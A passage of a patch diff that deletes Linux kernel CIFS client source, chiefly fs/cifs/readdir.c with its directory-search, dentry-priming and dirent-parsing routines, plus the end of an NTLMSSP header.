+- */
+-
+-int decode_ntlmssp_challenge(char *bcc_ptr, int blob_len, struct cifs_ses *ses);
+-int build_ntlmssp_negotiate_blob(unsigned char **pbuffer, u16 *buflen,
+-				 struct cifs_ses *ses,
+-				 struct TCP_Server_Info *server,
+-				 const struct nls_table *nls_cp);
+-int build_ntlmssp_smb3_negotiate_blob(unsigned char **pbuffer, u16 *buflen,
+-				 struct cifs_ses *ses,
+-				 struct TCP_Server_Info *server,
+-				 const struct nls_table *nls_cp);
+-int build_ntlmssp_auth_blob(unsigned char **pbuffer, u16 *buflen,
+-			struct cifs_ses *ses,
+-			struct TCP_Server_Info *server,
+-			const struct nls_table *nls_cp);
+diff --git a/fs/cifs/readdir.c b/fs/cifs/readdir.c
+deleted file mode 100644
+index 2d75ba5aaa8ad..0000000000000
+--- a/fs/cifs/readdir.c
++++ /dev/null
+@@ -1,1237 +0,0 @@
+-// SPDX-License-Identifier: LGPL-2.1
+-/*
+- *
+- *   Directory search handling
+- *
+- *   Copyright (C) International Business Machines  Corp., 2004, 2008
+- *   Copyright (C) Red Hat, Inc., 2011
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *
+- */
+-#include <linux/fs.h>
+-#include <linux/pagemap.h>
+-#include <linux/slab.h>
+-#include <linux/stat.h>
+-#include "cifspdu.h"
+-#include "cifsglob.h"
+-#include "cifsproto.h"
+-#include "cifs_unicode.h"
+-#include "cifs_debug.h"
+-#include "cifs_fs_sb.h"
+-#include "cifsfs.h"
+-#include "smb2proto.h"
+-#include "fs_context.h"
+-#include "cached_dir.h"
+-
+-/*
+- * To be safe - for UCS to UTF-8 with strings loaded with the rare long
+- * characters alloc more to account for such multibyte target UTF-8
+- * characters.
+- */
+-#define UNICODE_NAME_MAX ((4 * NAME_MAX) + 2)
+-
+-#ifdef CONFIG_CIFS_DEBUG2
+-static void dump_cifs_file_struct(struct file *file, char *label)
+-{
+-	struct cifsFileInfo *cf;
+-
+-	if (file) {
+-		cf = file->private_data;
+-		if (cf == NULL) {
+-			cifs_dbg(FYI, "empty cifs private file data\n");
+-			return;
+-		}
+-		if (cf->invalidHandle)
+-			cifs_dbg(FYI, "Invalid handle\n");
+-		if (cf->srch_inf.endOfSearch)
+-			cifs_dbg(FYI, "end of search\n");
+-		if (cf->srch_inf.emptyDir)
+-			cifs_dbg(FYI, "empty dir\n");
+-	}
+-}
+-#else
+-static inline void dump_cifs_file_struct(struct file *file, char *label)
+-{
+-}
+-#endif /* DEBUG2 */
+-
+-/*
+- * Attempt to preload the dcache with the results from the FIND_FIRST/NEXT
+- *
+- * Find the dentry that matches "name". If there isn't one, create one. If it's
+- * a negative dentry or the uniqueid or filetype(mode) changed,
+- * then drop it and recreate it.
+- */
+-static void
+-cifs_prime_dcache(struct dentry *parent, struct qstr *name,
+-		    struct cifs_fattr *fattr)
+-{
+-	struct dentry *dentry, *alias;
+-	struct inode *inode;
+-	struct super_block *sb = parent->d_sb;
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
+-	DECLARE_WAIT_QUEUE_HEAD_ONSTACK(wq);
+-
+-	cifs_dbg(FYI, "%s: for %s\n", __func__, name->name);
+-
+-	dentry = d_hash_and_lookup(parent, name);
+-	if (!dentry) {
+-		/*
+-		 * If we know that the inode will need to be revalidated
+-		 * immediately, then don't create a new dentry for it.
+-		 * We'll end up doing an on-the-wire call either way and
+-		 * this spares us an invalidation.
+-		 */
+-		if (fattr->cf_flags & CIFS_FATTR_NEED_REVAL)
+-			return;
+-retry:
+-		dentry = d_alloc_parallel(parent, name, &wq);
+-	}
+-	if (IS_ERR(dentry))
+-		return;
+-	if (!d_in_lookup(dentry)) {
+-		inode = d_inode(dentry);
+-		if (inode) {
+-			if (d_mountpoint(dentry)) {
+-				dput(dentry);
+-				return;
+-			}
+-			/*
+-			 * If we're generating inode numbers, then we don't
+-			 * want to clobber the existing one with the one that
+-			 * the readdir code created.
+-			 */
+-			if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SERVER_INUM))
+-				fattr->cf_uniqueid = CIFS_I(inode)->uniqueid;
+-
+-			/* update the inode in place
+-			 * if neither i_ino nor i_mode changed */
+-			if (CIFS_I(inode)->uniqueid == fattr->cf_uniqueid &&
+-			    cifs_fattr_to_inode(inode, fattr) == 0) {
+-				dput(dentry);
+-				return;
+-			}
+-		}
+-		d_invalidate(dentry);
+-		dput(dentry);
+-		goto retry;
+-	} else {
+-		inode = cifs_iget(sb, fattr);
+-		if (!inode)
+-			inode = ERR_PTR(-ENOMEM);
+-		alias = d_splice_alias(inode, dentry);
+-		d_lookup_done(dentry);
+-		if (alias && !IS_ERR(alias))
+-			dput(alias);
+-	}
+-	dput(dentry);
+-}
+-
+-static bool reparse_file_needs_reval(const struct cifs_fattr *fattr)
+-{
+-	if (!(fattr->cf_cifsattrs & ATTR_REPARSE))
+-		return false;
+-	/*
+-	 * The DFS tags should only be interpreted by the server side as per
+-	 * MS-FSCC 2.1.2.1, but let's include them anyway.
+-	 *
+-	 * Besides, if cf_cifstag is unset (0), then we still need it to be
+-	 * revalidated to know exactly what reparse point it is.
+-	 */
+-	switch (fattr->cf_cifstag) {
+-	case IO_REPARSE_TAG_DFS:
+-	case IO_REPARSE_TAG_DFSR:
+-	case IO_REPARSE_TAG_SYMLINK:
+-	case IO_REPARSE_TAG_NFS:
+-	case 0:
+-		return true;
+-	}
+-	return false;
+-}
+-
+-static void
+-cifs_fill_common_info(struct cifs_fattr *fattr, struct cifs_sb_info *cifs_sb)
+-{
+-	fattr->cf_uid = cifs_sb->ctx->linux_uid;
+-	fattr->cf_gid = cifs_sb->ctx->linux_gid;
+-
+-	/*
+-	 * The IO_REPARSE_TAG_LX_ tags originally were used by WSL but they
+-	 * are preferred by the Linux client in some cases since, unlike
+-	 * the NFS reparse tag (or EAs), they don't require an extra query
+-	 * to determine which type of special file they represent.
+-	 * TODO: go through all documented reparse tags to see if we can
+-	 * reasonably map some of them to directories vs. files vs. symlinks
+-	 */
+-	if (fattr->cf_cifsattrs & ATTR_DIRECTORY) {
+-		fattr->cf_mode = S_IFDIR | cifs_sb->ctx->dir_mode;
+-		fattr->cf_dtype = DT_DIR;
+-	} else if (fattr->cf_cifstag == IO_REPARSE_TAG_LX_SYMLINK) {
+-		fattr->cf_mode |= S_IFLNK | cifs_sb->ctx->file_mode;
+-		fattr->cf_dtype = DT_LNK;
+-	} else if (fattr->cf_cifstag == IO_REPARSE_TAG_LX_FIFO) {
+-		fattr->cf_mode |= S_IFIFO | cifs_sb->ctx->file_mode;
+-		fattr->cf_dtype = DT_FIFO;
+-	} else if (fattr->cf_cifstag == IO_REPARSE_TAG_AF_UNIX) {
+-		fattr->cf_mode |= S_IFSOCK | cifs_sb->ctx->file_mode;
+-		fattr->cf_dtype = DT_SOCK;
+-	} else if (fattr->cf_cifstag == IO_REPARSE_TAG_LX_CHR) {
+-		fattr->cf_mode |= S_IFCHR | cifs_sb->ctx->file_mode;
+-		fattr->cf_dtype = DT_CHR;
+-	} else if (fattr->cf_cifstag == IO_REPARSE_TAG_LX_BLK) {
+-		fattr->cf_mode |= S_IFBLK | cifs_sb->ctx->file_mode;
+-		fattr->cf_dtype = DT_BLK;
+-	} else { /* TODO: should we mark some other reparse points (like DFSR) as directories? */
+-		fattr->cf_mode = S_IFREG | cifs_sb->ctx->file_mode;
+-		fattr->cf_dtype = DT_REG;
+-	}
+-
+-	/*
+-	 * We need to revalidate it further to make a decision about whether it
+-	 * is a symbolic link, DFS referral, or a reparse point with direct
+-	 * access, like junctions, deduplicated files, or NFS symlinks.
+-	 */
+-	if (reparse_file_needs_reval(fattr))
+-		fattr->cf_flags |= CIFS_FATTR_NEED_REVAL;
+-
+-	/* non-unix readdir doesn't provide nlink */
+-	fattr->cf_flags |= CIFS_FATTR_UNKNOWN_NLINK;
+-
+-	if (fattr->cf_cifsattrs & ATTR_READONLY)
+-		fattr->cf_mode &= ~S_IWUGO;
+-
+-	/*
+-	 * We of course don't get ACL info in FIND_FIRST/NEXT results, so
+-	 * mark it for revalidation so that "ls -l" will look right. It might
+-	 * be super-slow, but if we don't do this then the ownership of files
+-	 * may look wrong since the inodes may not have timed out by the time
+-	 * "ls" does a stat() call on them.
+-	 */
+-	if ((cifs_sb->mnt_cifs_flags & CIFS_MOUNT_CIFS_ACL) ||
+-	    (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MODE_FROM_SID))
+-		fattr->cf_flags |= CIFS_FATTR_NEED_REVAL;
+-
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_UNX_EMUL &&
+-	    fattr->cf_cifsattrs & ATTR_SYSTEM) {
+-		if (fattr->cf_eof == 0)  {
+-			fattr->cf_mode &= ~S_IFMT;
+-			fattr->cf_mode |= S_IFIFO;
+-			fattr->cf_dtype = DT_FIFO;
+-		} else {
+-			/*
+-			 * trying to get the type and mode via SFU can be slow,
+-			 * so just treat those as regular files for now, and
+-			 * mark them for reval
+-			 */
+-			fattr->cf_flags |= CIFS_FATTR_NEED_REVAL;
+-		}
+-	}
+-}
+-
+-/* Fill a cifs_fattr struct with info from SMB_FIND_FILE_POSIX_INFO. */
+-static void
+-cifs_posix_to_fattr(struct cifs_fattr *fattr, struct smb2_posix_info *info,
+-		    struct cifs_sb_info *cifs_sb)
+-{
+-	struct smb2_posix_info_parsed parsed;
+-
+-	posix_info_parse(info, NULL, &parsed);
+-
+-	memset(fattr, 0, sizeof(*fattr));
+-	fattr->cf_uniqueid = le64_to_cpu(info->Inode);
+-	fattr->cf_bytes = le64_to_cpu(info->AllocationSize);
+-	fattr->cf_eof = le64_to_cpu(info->EndOfFile);
+-
+-	fattr->cf_atime = cifs_NTtimeToUnix(info->LastAccessTime);
+-	fattr->cf_mtime = cifs_NTtimeToUnix(info->LastWriteTime);
+-	fattr->cf_ctime = cifs_NTtimeToUnix(info->CreationTime);
+-
+-	fattr->cf_nlink = le32_to_cpu(info->HardLinks);
+-	fattr->cf_cifsattrs = le32_to_cpu(info->DosAttributes);
+-
+-	/*
+-	 * Since we set the inode type below, we need to mask off the
+-	 * type bits to avoid strange results if any were set above.
+-	 * XXX: why not make server&client use the type bits?
+-	 */
+-	fattr->cf_mode = le32_to_cpu(info->Mode) & ~S_IFMT;
+-
+-	cifs_dbg(FYI, "posix fattr: dev %d, reparse %d, mode %o\n",
+-		 le32_to_cpu(info->DeviceId),
+-		 le32_to_cpu(info->ReparseTag),
+-		 le32_to_cpu(info->Mode));
+-
+-	if (fattr->cf_cifsattrs & ATTR_DIRECTORY) {
+-		fattr->cf_mode |= S_IFDIR;
+-		fattr->cf_dtype = DT_DIR;
+-	} else {
+-		/*
+-		 * mark anything that is not a dir as a regular
+-		 * file. special files should have the REPARSE
+-		 * attribute and will be marked as needing revalidation
+-		 */
+-		fattr->cf_mode |= S_IFREG;
+-		fattr->cf_dtype = DT_REG;
+-	}
+-
+-	if (reparse_file_needs_reval(fattr))
+-		fattr->cf_flags |= CIFS_FATTR_NEED_REVAL;
+-
+-	sid_to_id(cifs_sb, &parsed.owner, fattr, SIDOWNER);
+-	sid_to_id(cifs_sb, &parsed.group, fattr, SIDGROUP);
+-}
+-
+-static void __dir_info_to_fattr(struct cifs_fattr *fattr, const void *info)
+-{
+-	const FILE_DIRECTORY_INFO *fi = info;
+-
+-	memset(fattr, 0, sizeof(*fattr));
+-	fattr->cf_cifsattrs = le32_to_cpu(fi->ExtFileAttributes);
+-	fattr->cf_eof = le64_to_cpu(fi->EndOfFile);
+-	fattr->cf_bytes = le64_to_cpu(fi->AllocationSize);
+-	fattr->cf_createtime = le64_to_cpu(fi->CreationTime);
+-	fattr->cf_atime = cifs_NTtimeToUnix(fi->LastAccessTime);
+-	fattr->cf_ctime = cifs_NTtimeToUnix(fi->ChangeTime);
+-	fattr->cf_mtime = cifs_NTtimeToUnix(fi->LastWriteTime);
+-}
+-
+-void
+-cifs_dir_info_to_fattr(struct cifs_fattr *fattr, FILE_DIRECTORY_INFO *info,
+-		       struct cifs_sb_info *cifs_sb)
+-{
+-	__dir_info_to_fattr(fattr, info);
+-	cifs_fill_common_info(fattr, cifs_sb);
+-}
+-
+-static void cifs_fulldir_info_to_fattr(struct cifs_fattr *fattr,
+-				       SEARCH_ID_FULL_DIR_INFO *info,
+-				       struct cifs_sb_info *cifs_sb)
+-{
+-	__dir_info_to_fattr(fattr, info);
+-
+-	/* See MS-FSCC 2.4.19 FileIdFullDirectoryInformation */
+-	if (fattr->cf_cifsattrs & ATTR_REPARSE)
+-		fattr->cf_cifstag = le32_to_cpu(info->EaSize);
+-	cifs_fill_common_info(fattr, cifs_sb);
+-}
+-
+-static void
+-cifs_std_info_to_fattr(struct cifs_fattr *fattr, FIND_FILE_STANDARD_INFO *info,
+-		       struct cifs_sb_info *cifs_sb)
+-{
+-	int offset = cifs_sb_master_tcon(cifs_sb)->ses->server->timeAdj;
+-
+-	memset(fattr, 0, sizeof(*fattr));
+-	fattr->cf_atime = cnvrtDosUnixTm(info->LastAccessDate,
+-					    info->LastAccessTime, offset);
+-	fattr->cf_ctime = cnvrtDosUnixTm(info->LastWriteDate,
+-					    info->LastWriteTime, offset);
+-	fattr->cf_mtime = cnvrtDosUnixTm(info->LastWriteDate,
+-					    info->LastWriteTime, offset);
+-
+-	fattr->cf_cifsattrs = le16_to_cpu(info->Attributes);
+-	fattr->cf_bytes = le32_to_cpu(info->AllocationSize);
+-	fattr->cf_eof = le32_to_cpu(info->DataSize);
+-
+-	cifs_fill_common_info(fattr, cifs_sb);
+-}
+-
+-/* BB eventually need to add the following helper function to
+-      resolve NT_STATUS_STOPPED_ON_SYMLINK return code when
+-      we try to do FindFirst on (NTFS) directory symlinks */
+-/*
+-int get_symlink_reparse_path(char *full_path, struct cifs_sb_info *cifs_sb,
+-			     unsigned int xid)
+-{
+-	__u16 fid;
+-	int len;
+-	int oplock = 0;
+-	int rc;
+-	struct cifs_tcon *ptcon = cifs_sb_tcon(cifs_sb);
+-	char *tmpbuffer;
+-
+-	rc = CIFSSMBOpen(xid, ptcon, full_path, FILE_OPEN, GENERIC_READ,
+-			OPEN_REPARSE_POINT, &fid, &oplock, NULL,
+-			cifs_sb->local_nls,
+-			cifs_remap(cifs_sb));
+-	if (!rc) {
+-		tmpbuffer = kmalloc(maxpath, GFP_KERNEL);
+-		rc = CIFSSMBQueryReparseLinkInfo(xid, ptcon, full_path,
+-				tmpbuffer,
+-				maxpath -1,
+-				fid,
+-				cifs_sb->local_nls);
+-		if (CIFSSMBClose(xid, ptcon, fid)) {
+-			cifs_dbg(FYI, "Error closing temporary reparsepoint open\n");
+-		}
+-	}
+-	return rc;
+-}
+- */
+-
+-static int
+-_initiate_cifs_search(const unsigned int xid, struct file *file,
+-		     const char *full_path)
+-{
+-	__u16 search_flags;
+-	int rc = 0;
+-	struct cifsFileInfo *cifsFile;
+-	struct cifs_sb_info *cifs_sb = CIFS_FILE_SB(file);
+-	struct tcon_link *tlink = NULL;
+-	struct cifs_tcon *tcon;
+-	struct TCP_Server_Info *server;
+-
+-	if (file->private_data == NULL) {
+-		tlink = cifs_sb_tlink(cifs_sb);
+-		if (IS_ERR(tlink))
+-			return PTR_ERR(tlink);
+-
+-		cifsFile = kzalloc(sizeof(struct cifsFileInfo), GFP_KERNEL);
+-		if (cifsFile == NULL) {
+-			rc = -ENOMEM;
+-			goto error_exit;
+-		}
+-		spin_lock_init(&cifsFile->file_info_lock);
+-		file->private_data = cifsFile;
+-		cifsFile->tlink = cifs_get_tlink(tlink);
+-		tcon = tlink_tcon(tlink);
+-	} else {
+-		cifsFile = file->private_data;
+-		tcon = tlink_tcon(cifsFile->tlink);
+-	}
+-
+-	server = tcon->ses->server;
+-
+-	if (!server->ops->query_dir_first) {
+-		rc = -ENOSYS;
+-		goto error_exit;
+-	}
+-
+-	cifsFile->invalidHandle = true;
+-	cifsFile->srch_inf.endOfSearch = false;
+-
+-	cifs_dbg(FYI, "Full path: %s start at: %lld\n", full_path, file->f_pos);
+-
+-ffirst_retry:
+-	/* test for Unix extensions */
+-	/* but now check for them on the share/mount, not on the SMB session */
+-	/* if (cap_unix(tcon->ses)) { */
+-	if (tcon->unix_ext)
+-		cifsFile->srch_inf.info_level = SMB_FIND_FILE_UNIX;
+-	else if (tcon->posix_extensions)
+-		cifsFile->srch_inf.info_level = SMB_FIND_FILE_POSIX_INFO;
+-	else if ((tcon->ses->capabilities &
+-		  tcon->ses->server->vals->cap_nt_find) == 0) {
+-		cifsFile->srch_inf.info_level = SMB_FIND_FILE_INFO_STANDARD;
+-	} else if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SERVER_INUM) {
+-		cifsFile->srch_inf.info_level = SMB_FIND_FILE_ID_FULL_DIR_INFO;
+-	} else /* not srvinos - BB fixme add check for backlevel? */ {
+-		cifsFile->srch_inf.info_level = SMB_FIND_FILE_DIRECTORY_INFO;
+-	}
+-
+-	search_flags = CIFS_SEARCH_CLOSE_AT_END | CIFS_SEARCH_RETURN_RESUME;
+-	if (backup_cred(cifs_sb))
+-		search_flags |= CIFS_SEARCH_BACKUP_SEARCH;
+-
+-	rc = server->ops->query_dir_first(xid, tcon, full_path, cifs_sb,
+-					  &cifsFile->fid, search_flags,
+-					  &cifsFile->srch_inf);
+-
+-	if (rc == 0)
+-		cifsFile->invalidHandle = false;
+-	/* BB add following call to handle readdir on new NTFS symlink errors
+-	else if STATUS_STOPPED_ON_SYMLINK
+-		call get_symlink_reparse_path and retry with new path */
+-	else if ((rc == -EOPNOTSUPP) &&
+-		(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SERVER_INUM)) {
+-		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_SERVER_INUM;
+-		goto ffirst_retry;
+-	}
+-error_exit:
+-	cifs_put_tlink(tlink);
+-	return rc;
+-}
+-
+-static int
+-initiate_cifs_search(const unsigned int xid, struct file *file,
+-		     const char *full_path)
+-{
+-	int rc, retry_count = 0;
+-
+-	do {
+-		rc = _initiate_cifs_search(xid, file, full_path);
+-		/*
+-		 * If we don't have enough credits to start reading the
+-		 * directory, just try again after a short wait.
+-		 */
+-		if (rc != -EDEADLK)
+-			break;
+-
+-		usleep_range(512, 2048);
+-	} while (retry_count++ < 5);
+-
+-	return rc;
+-}
+-
+-/* return length of unicode string in bytes */
+-static int cifs_unicode_bytelen(const char *str)
+-{
+-	int len;
+-	const __le16 *ustr = (const __le16 *)str;
+-
+-	for (len = 0; len <= PATH_MAX; len++) {
+-		if (ustr[len] == 0)
+-			return len << 1;
+-	}
+-	cifs_dbg(FYI, "Unicode string longer than PATH_MAX found\n");
+-	return len << 1;
+-}
+-
+-static char *nxt_dir_entry(char *old_entry, char *end_of_smb, int level)
+-{
+-	char *new_entry;
+-	FILE_DIRECTORY_INFO *pDirInfo = (FILE_DIRECTORY_INFO *)old_entry;
+-
+-	if (level == SMB_FIND_FILE_INFO_STANDARD) {
+-		FIND_FILE_STANDARD_INFO *pfData;
+-		pfData = (FIND_FILE_STANDARD_INFO *)pDirInfo;
+-
+-		new_entry = old_entry + sizeof(FIND_FILE_STANDARD_INFO) +
+-				pfData->FileNameLength;
+-	} else {
+-		u32 next_offset = le32_to_cpu(pDirInfo->NextEntryOffset);
+-
+-		if (old_entry + next_offset < old_entry) {
+-			cifs_dbg(VFS, "Invalid offset %u\n", next_offset);
+-			return NULL;
+-		}
+-		new_entry = old_entry + next_offset;
+-	}
+-	cifs_dbg(FYI, "new entry %p old entry %p\n", new_entry, old_entry);
+-	/* validate that new_entry is not past end of SMB */
+-	if (new_entry >= end_of_smb) {
+-		cifs_dbg(VFS, "search entry %p began after end of SMB %p old entry %p\n",
+-			 new_entry, end_of_smb, old_entry);
+-		return NULL;
+-	} else if (((level == SMB_FIND_FILE_INFO_STANDARD) &&
+-		    (new_entry + sizeof(FIND_FILE_STANDARD_INFO) > end_of_smb))
+-		  || ((level != SMB_FIND_FILE_INFO_STANDARD) &&
+-		   (new_entry + sizeof(FILE_DIRECTORY_INFO) > end_of_smb)))  {
+-		cifs_dbg(VFS, "search entry %p extends after end of SMB %p\n",
+-			 new_entry, end_of_smb);
+-		return NULL;
+-	} else
+-		return new_entry;
+-
+-}
+-
+-struct cifs_dirent {
+-	const char	*name;
+-	size_t		namelen;
+-	u32		resume_key;
+-	u64		ino;
+-};
+-
+-static void cifs_fill_dirent_posix(struct cifs_dirent *de,
+-				   const struct smb2_posix_info *info)
+-{
+-	struct smb2_posix_info_parsed parsed;
+-
+-	/* payload should have already been checked at this point */
+-	if (posix_info_parse(info, NULL, &parsed) < 0) {
+-		cifs_dbg(VFS, "Invalid POSIX info payload\n");
+-		return;
+-	}
+-
+-	de->name = parsed.name;
+-	de->namelen = parsed.name_len;
+-	de->resume_key = info->Ignored;
+-	de->ino = le64_to_cpu(info->Inode);
+-}
+-
+-static void cifs_fill_dirent_unix(struct cifs_dirent *de,
+-		const FILE_UNIX_INFO *info, bool is_unicode)
+-{
+-	de->name = &info->FileName[0];
+-	if (is_unicode)
+-		de->namelen = cifs_unicode_bytelen(de->name);
+-	else
+-		de->namelen = strnlen(de->name, PATH_MAX);
+-	de->resume_key = info->ResumeKey;
+-	de->ino = le64_to_cpu(info->basic.UniqueId);
+-}
+-
+-static void cifs_fill_dirent_dir(struct cifs_dirent *de,
+-		const FILE_DIRECTORY_INFO *info)
+-{
+-	de->name = &info->FileName[0];
+-	de->namelen = le32_to_cpu(info->FileNameLength);
+-	de->resume_key = info->FileIndex;
+-}
+-
+-static void cifs_fill_dirent_full(struct cifs_dirent *de,
+-		const FILE_FULL_DIRECTORY_INFO *info)
+-{
+-	de->name = &info->FileName[0];
+-	de->namelen = le32_to_cpu(info->FileNameLength);
+-	de->resume_key = info->FileIndex;
+-}
+-
+-static void cifs_fill_dirent_search(struct cifs_dirent *de,
+-		const SEARCH_ID_FULL_DIR_INFO *info)
+-{
+-	de->name = &info->FileName[0];
+-	de->namelen = le32_to_cpu(info->FileNameLength);
+-	de->resume_key = info->FileIndex;
+-	de->ino = le64_to_cpu(info->UniqueId);
+-}
+-
+-static void cifs_fill_dirent_both(struct cifs_dirent *de,
+-		const FILE_BOTH_DIRECTORY_INFO *info)
+-{
+-	de->name = &info->FileName[0];
+-	de->namelen = le32_to_cpu(info->FileNameLength);
+-	de->resume_key = info->FileIndex;
+-}
+-
+-static void cifs_fill_dirent_std(struct cifs_dirent *de,
+-		const FIND_FILE_STANDARD_INFO *info)
+-{
+-	de->name = &info->FileName[0];
+-	/* one byte length, no endianness conversion */
+-	de->namelen = info->FileNameLength;
+-	de->resume_key = info->ResumeKey;
+-}
+-
+-static int cifs_fill_dirent(struct cifs_dirent *de, const void *info,
+-		u16 level, bool is_unicode)
+-{
+-	memset(de, 0, sizeof(*de));
+-
+-	switch (level) {
+-	case SMB_FIND_FILE_POSIX_INFO:
+-		cifs_fill_dirent_posix(de, info);
+-		break;
+-	case SMB_FIND_FILE_UNIX:
+-		cifs_fill_dirent_unix(de, info, is_unicode);
+-		break;
+-	case SMB_FIND_FILE_DIRECTORY_INFO:
+-		cifs_fill_dirent_dir(de, info);
+-		break;
+-	case SMB_FIND_FILE_FULL_DIRECTORY_INFO:
+-		cifs_fill_dirent_full(de, info);
+-		break;
+-	case SMB_FIND_FILE_ID_FULL_DIR_INFO:
+-		cifs_fill_dirent_search(de, info);
+-		break;
+-	case SMB_FIND_FILE_BOTH_DIRECTORY_INFO:
+-		cifs_fill_dirent_both(de, info);
+-		break;
+-	case SMB_FIND_FILE_INFO_STANDARD:
+-		cifs_fill_dirent_std(de, info);
+-		break;
+-	default:
+-		cifs_dbg(FYI, "Unknown findfirst level %d\n", level);
+-		return -EINVAL;
+-	}
+-
+-	return 0;
+-}
+-
+-#define UNICODE_DOT cpu_to_le16(0x2e)
+-
+-/* return 0 if no match and 1 for . (current directory) and 2 for .. (parent) */
+-static int cifs_entry_is_dot(struct cifs_dirent *de, bool is_unicode)
+-{
+-	int rc = 0;
+-
+-	if (!de->name)
+-		return 0;
+-
+-	if (is_unicode) {
+-		__le16 *ufilename = (__le16 *)de->name;
+-		if (de->namelen == 2) {
+-			/* check for . */
+-			if (ufilename[0] == UNICODE_DOT)
+-				rc = 1;
+-		} else if (de->namelen == 4) {
+-			/* check for .. */
+-			if (ufilename[0] == UNICODE_DOT &&
+-			    ufilename[1] == UNICODE_DOT)
+-				rc = 2;
+-		}
+-	} else /* ASCII */ {
+-		if (de->namelen == 1) {
+-			if (de->name[0] == '.')
+-				rc = 1;
+-		} else if (de->namelen == 2) {
+-			if (de->name[0] == '.' && de->name[1] == '.')
+-				rc = 2;
+-		}
+-	}
+-
+-	return rc;
+-}
+-
+-/* Check if the directory that we are searching has changed so we can decide
+-   whether we can use the cached search results from the previous search */
+-static int is_dir_changed(struct file *file)
+-{
+-	struct inode *inode = file_inode(file);
+-	struct cifsInodeInfo *cifsInfo = CIFS_I(inode);
+-
+-	if (cifsInfo->time == 0)
+-		return 1; /* directory was changed, perhaps due to unlink */
+-	else
+-		return 0;
+-
+-}
+-
+-static int cifs_save_resume_key(const char *current_entry,
+-	struct cifsFileInfo *file_info)
+-{
+-	struct cifs_dirent de;
+-	int rc;
+-
+-	rc = cifs_fill_dirent(&de, current_entry, file_info->srch_inf.info_level,
+-			      file_info->srch_inf.unicode);
+-	if (!rc) {
+-		file_info->srch_inf.presume_name = de.name;
+-		file_info->srch_inf.resume_name_len = de.namelen;
+-		file_info->srch_inf.resume_key = de.resume_key;
+-	}
+-	return rc;
+-}
+-
+-/*
+- * Find the corresponding entry in the search. Note that the SMB server returns
+- * search entries for . and .. which complicates logic here if we choose to
+- * parse for them and we do not assume that they are located in the findfirst
+- * return buffer. We start counting in the buffer with entry 2 and increment for
+- * every entry (do not increment for . or .. entry).
+- */
+-static int
+-find_cifs_entry(const unsigned int xid, struct cifs_tcon *tcon, loff_t pos,
+-		struct file *file, const char *full_path,
+-		char **current_entry, int *num_to_ret)
+-{
+-	__u16 search_flags;
+-	int rc = 0;
+-	int pos_in_buf = 0;
+-	loff_t first_entry_in_buffer;
+-	loff_t index_to_find = pos;
+-	struct cifsFileInfo *cfile = file->private_data;
+-	struct cifs_sb_info *cifs_sb = CIFS_FILE_SB(file);
+-	struct TCP_Server_Info *server = tcon->ses->server;
+-	/* check if the index is in the buffer */
+-
+-	if (!server->ops->query_dir_first || !server->ops->query_dir_next)
+-		return -ENOSYS;
+-
+-	if ((cfile == NULL) || (current_entry == NULL) || (num_to_ret == NULL))
+-		return -ENOENT;
+-
+-	*current_entry = NULL;
+-	first_entry_in_buffer = cfile->srch_inf.index_of_last_entry -
+-					cfile->srch_inf.entries_in_buffer;
+-
+-	/*
+-	 * If the first entry in the buffer is zero, then this is the first
+-	 * buffer in the search response data, which means it is likely that
+-	 * . and .. will be in this buffer, although some servers do not
+-	 * return . and .. for the root of a drive, and for those we need
+-	 * to start two entries earlier.
+-	 */
+-
+-	dump_cifs_file_struct(file, "In fce ");
+-	if (((index_to_find < cfile->srch_inf.index_of_last_entry) &&
+-	     is_dir_changed(file)) || (index_to_find < first_entry_in_buffer)) {
+-		/* close and restart search */
+-		cifs_dbg(FYI, "search backing up - close and restart search\n");
+-		spin_lock(&cfile->file_info_lock);
+-		if (server->ops->dir_needs_close(cfile)) {
+-			cfile->invalidHandle = true;
+-			spin_unlock(&cfile->file_info_lock);
+-			if (server->ops->close_dir)
+-				server->ops->close_dir(xid, tcon, &cfile->fid);
+-		} else
+-			spin_unlock(&cfile->file_info_lock);
+-		if (cfile->srch_inf.ntwrk_buf_start) {
+-			cifs_dbg(FYI, "freeing SMB ff cache buf on search rewind\n");
+-			if (cfile->srch_inf.smallBuf)
+-				cifs_small_buf_release(cfile->srch_inf.
+-						ntwrk_buf_start);
+-			else
+-				cifs_buf_release(cfile->srch_inf.
+-						ntwrk_buf_start);
+-			cfile->srch_inf.ntwrk_buf_start = NULL;
+-		}
+-		rc = initiate_cifs_search(xid, file, full_path);
+-		if (rc) {
+-			cifs_dbg(FYI, "error %d reinitiating a search on rewind\n",
+-				 rc);
+-			return rc;
+-		}
+-		/* FindFirst/Next set last_entry to NULL on malformed reply */
+-		if (cfile->srch_inf.last_entry)
+-			cifs_save_resume_key(cfile->srch_inf.last_entry, cfile);
+-	}
+-
+-	search_flags = CIFS_SEARCH_CLOSE_AT_END | CIFS_SEARCH_RETURN_RESUME;
+-	if (backup_cred(cifs_sb))
+-		search_flags |= CIFS_SEARCH_BACKUP_SEARCH;
+-
+-	while ((index_to_find >= cfile->srch_inf.index_of_last_entry) &&
+-	       (rc == 0) && !cfile->srch_inf.endOfSearch) {
+-		cifs_dbg(FYI, "calling findnext2\n");
+-		rc = server->ops->query_dir_next(xid, tcon, &cfile->fid,
+-						 search_flags,
+-						 &cfile->srch_inf);
+-		/* FindFirst/Next set last_entry to NULL on malformed reply */
+-		if (cfile->srch_inf.last_entry)
+-			cifs_save_resume_key(cfile->srch_inf.last_entry, cfile);
+-		if (rc)
+-			return -ENOENT;
+-	}
+-	if (index_to_find < cfile->srch_inf.index_of_last_entry) {
+-		/* we found the buffer that contains the entry */
+-		/* scan and find it */
+-		int i;
+-		char *cur_ent;
+-		char *end_of_smb;
+-
+-		if (cfile->srch_inf.ntwrk_buf_start == NULL) {
+-			cifs_dbg(VFS, "ntwrk_buf_start is NULL during readdir\n");
+-			return -EIO;
+-		}
+-
+-		end_of_smb = cfile->srch_inf.ntwrk_buf_start +
+-			server->ops->calc_smb_size(
+-					cfile->srch_inf.ntwrk_buf_start);
+-
+-		cur_ent = cfile->srch_inf.srch_entries_start;
+-		first_entry_in_buffer = cfile->srch_inf.index_of_last_entry
+-					- cfile->srch_inf.entries_in_buffer;
